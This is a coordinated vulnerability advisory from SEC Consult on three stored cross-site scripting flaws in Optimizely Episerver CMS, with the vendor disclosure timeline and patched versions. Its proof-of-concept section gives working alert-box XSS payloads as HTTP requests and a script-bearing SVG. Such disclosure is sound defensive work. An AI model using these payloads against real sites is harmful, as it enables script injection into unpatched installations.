📄 Optimizely Episerver Content Management System 11.x / 12.x Cross Site Scripting

Confidentiality class: Internal & Partner
    
    SEC Consult Vulnerability Lab Security Advisory < publishing date 20250728-0 >
    =======================================================================
                  title: Multiple Stored Cross-Site Scripting Vulnerabilities
                product: Optimizely Episerver Content Management System (EPiServer.CMS.Core)
     vulnerable version: Version 11.X: <11.21.4
                         Version 12.X: <12.22.1
          fixed version: Version 11.X: 11.21.4
                         Version 12.X: 12.22.1
             CVE number: CVE-2025-27800, CVE-2025-27801, CVE-2025-27802
                 impact: medium
               homepage: https://www.optimizely.com
                  found: 2024-04-25
                     by: Kai Zimmermann (Office Frankfurt)
                         Felix Beie (Office Fürth)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Eviden business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "Optimizely Content Management System equips marketers and developers with a modern,
    fully composable suite of user-friendly tools. Deliver impactful experiences across
    any channel, and personalize with AI-driven insights."
    
    Source: https://www.optimizely.com/products/content-management/
    
    
    Business recommendation:
    ------------------------
    The vendor already provides a security patch (updated packages) which should be
    installed immediately.
    
    SEC Consult highly recommends to perform a thorough security review of the product
    conducted by security professionals to identify and resolve potential further
    security issues.
    
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Stored Cross-Site Scripting in Admin Dashboard (CVE-2025-27800)
    The Admin dashboard offered the functionality to add gadgets to the dashboard.
    This included the "Notes" gadget. An authenticated attacker with the corresponding
    access rights (such as "WebAdmin") that was impersonating the victim could insert
    malicious JavaScript code in these notes that would be executed if the victim
    visited the dashboard.
    
    2) Stored Cross-Site Scripting in Media Selection Preview (CVE-2025-27801)
    ContentReference properties, which could be used in the "Edit" section of the CMS,
    offered an upload functionality for documents. These documents could later be used
    as displayed content on the page. It was possible to upload SVG files that include
    malicious JavaScript code that would be executed if a user visited the direct URL
    of the preview image. Attackers needed at least the role "WebEditor" in order to
    exploit this issue.
    
    3) Stored Cross-Site Scripting in Edit Preview (CVE-2025-27802)
    RTE properties (text fields), which could be used in the "Edit" section of the CMS,
    allowed the input of arbitrary text. It was possible to input malicious JavaScript
    code in these properties that would be executed if a user visits the previewed
    page. Attackers needed at least the role "WebEditor" in order to exploit this issue.
    
    
    Proof of concept:
    -----------------
    1) Stored Cross-Site Scripting in Admin Dashboard (CVE-2025-27800)
    After adding a newly created note on the dashboard, it could be edited by sending
    the following request:
    
    --------------------------------------------------------------------------------
    POST /EPiServer/CMS/Notes/Save?preferredNamespace=EPiServer.Cms.Shell.UI.Controllers.Internal&gadgetId=$GADGETID HTTP/2
    Host: $SERVER
    Cookie: sessionId=[...]; .EPiServerLogin=[...]; .ASPXROLES=[...]; __RequestVerificationToken=[...]
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 177
    
    content=Test%3cbr%3e%3cimg%20src%3dx%20onerror%3dalert(window.location)%3e&__RequestVerificationToken=[...]
    --------------------------------------------------------------------------------
    
    Visiting the dashboard again, as seen in figure 1 below, showed that the
    JavaScript code is executed:
    [01_admin_dashboard.png]
    
    
    2) Stored Cross-Site Scripting in Media Selection Preview (CVE-2025-27801)
    The following SVG file containing a JavaScript alert could be uploaded as a document
    in one of the ContentReference properties:
    
    --------------------------------------------------------------------------------
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
        <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
        <script type="text/javascript">alert(window.origin);</script>
    </svg>
    --------------------------------------------------------------------------------
    
    Visiting the preview URL, as seen in figure 2 below, showed that the JavaScript alert
    was executed:
    [02_svg_upload.png]
    
    
    3) Stored Cross-Site Scripting in Edit Preview (CVE-2025-27802)
    When adding HTML elements directly in the input field, they were encoded by the
    frontend. The request, which was sent when editing the text, could be intercepted
    and modified so that the encoding was reverted. The following request was then
    sent to add a malicious JavaScript element that caused an alert when the element
    was rendered:
    
    --------------------------------------------------------------------------------
    POST /EPiServer/cms/Stores/contentdata/$ID HTTP/2
    Host: $SERVER
    Cookie: .EPiServerLogin=[...];
    Content-Length: 194
    Content-Type: application/json
    [...]
    
    {"id":"$ID","properties":{"address":"\"[...]<script>alert(window.location)</script>[...]""},"action":$ACTIONID}
    --------------------------------------------------------------------------------
    
    After publishing the changes, the page preview could be visited by clicking on the
    respective icon on the top right of the "Edit" section. Before the preview was
    shown, the JavaScript alert was executed, as can be seen in figure 3 below:
    [03_edit_preview.png]
    
    
    Vulnerable / tested versions:
    -----------------------------
    The vendor confirmed that the following plugin versions are affected:
    * Version 11.X: EPiServer.CMS.Core (<11.21.4) with EPiServer.CMS.UI (<11.37.5)
    * Version 12.X: EPiServer.CMS.Core (<12.22.1) with EPiServer.CMS.UI (<11.37.3)
    
    
    Vendor contact timeline:
    ------------------------
    2024-05-23: Contacting vendor through [email protected]
    2024-05-24: Vendor responds to submit our vulnerabilities at Bugcrowd
    2024-05-27: Asking vendor if it is possible via email, no suitable category
                at Bugcrowd; no response.
    2024-06-04: Asking vendor where to submit the advisory for the CMS;
                Vendor confirms that Bugcrowd should not be used and requested
                advisory unencrypted via email. Submitted advisory.
    2024-06-06: Sending requested information to the vendor; Vendor responds they
                got everything they need to check the provided advisory.
    2024-06-10: Vendor provides details for all vulnerabilities. According to the
                information, most XSS are present due to intentional design
                choices;
                      Asking for details regarding affected versions and a planned
                timeline to fix the vulnerabilities.
    2024-06-12: Vendor provides information, that probably all versions are
                affected by the vulnerabilities, as it is a design choice;
                Stored XSS in Admin Dashboard and Media Selection Preview were only
                      kept as a backlog/research item;
                There was no planned ETA for any of the 3 vulnerabilities.
    2024-06-18: Contacted vendor, explaining why the vulnerabilities should not
                be considered as "by design".
    2024-06-25: Update from vendor, that the issues were going to be flagged for
                resolution. The findings were planned to be resolved within 3
                months.
    2024-09-24: Asked for a status update.
    2024-09-24: Vendor contact checked with product team internally.
    2024-10-01: Asked for a status update.
    2024-10-08: Vendor confirmed first XSS issue fixed in CMS 12. Team was working on
                remaining two issues, planned to be resolved by mid December.
    2024-12-10: Asked for a status update.
    2025-01-06: Vendor confirmed that the instances have been remediated and provides
                affected plugins and versions. Vendor asked to wait with publication
                until a scheduled retest had been performed later this month.
    2025-02-05: Asked for a status update.
    2025-02-24: Asked for a status update.
    2025-03-07: Reserved CVE numbers, sending updated advisory to vendor, scheduled
                release for next week; Vendor was reviewing the advisory internally.
    2025-03-14: Vendor asked to postpone publication until the end of Q2. Reason given
                is that some customers were still using CMS major version 11, while the
                patches were only developed for CMS major version 12.
    2025-03-17: Asked vendor to clarify the updating process for customers.
    2025-05-21: Asked for a status update.
    2025-06-02: Vendor confirmed current timeline (end of Q2). There were different
                fixes for CMS version 11 and 12.
    2025-07-01: Asked for a status update.
    2025-07-03: Received fixed packages for CMS 11 and confirmation of packages for CMS 12.
    2025-07-28: Coordinated release of advisory.
    
    
    
    Solution:
    ---------
    The vendor provided the following updates. These versions of EPiServer.CMS.Core
    include a configuration to optionally filter for JavaScript code. Customers are
    urged to install the latest version and adjust the configuration accordingly
    in order to patch the security issues:
    * Version 11.X: Update EPiServer.CMS.Core to version 11.21.4 or higher
                    Update EPiServer.CMS.UI to version 11.37.5 or higher (dependency requirement)
    * Version 12.X: Update EPiServer.CMS.Core to version 12.22.1 or higher
                    Update EPiServer.CMS.UI to version 11.37.3 or higher (dependency requirement)
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Eviden business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Eviden business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web: https://www.sec-consult.com
    Blog: https://blog.sec-consult.com
    X: https://x.com/sec_consult
    
    EOF Kai Zimmermann, Felix Beie / 2025